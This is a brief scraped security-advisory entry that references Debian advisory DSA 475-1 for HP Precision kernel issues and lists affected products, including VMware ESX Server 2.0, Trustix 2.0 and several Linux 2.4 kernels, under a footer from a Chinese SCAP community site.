Debian has released advisory DSA 475-1 with fixes dealing with this and other issues for the HP Precision architecture.

Fixes:


Sun Cobalt RaQ 550

Trustix Secure Linux 2.0

VMWare ESX Server 2.0

VMWare ESX Server 2.0.1 build 6403

VMWare ESX Server 2.0.1

Linux kernel 2.4

Linux kernel 2.4.1

Linux kernel 2.4.11

Linux kernel 2.4.12

Linux kernel 2.4.13

Linux kernel 2.4.14

Linux kernel 2.4.15

Linux kernel 2.4.17

Linux kernel 2.4.18

Linux kernel 2.4.19

Linux kernel 2.4.21

Linux kernel 2.4.22

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站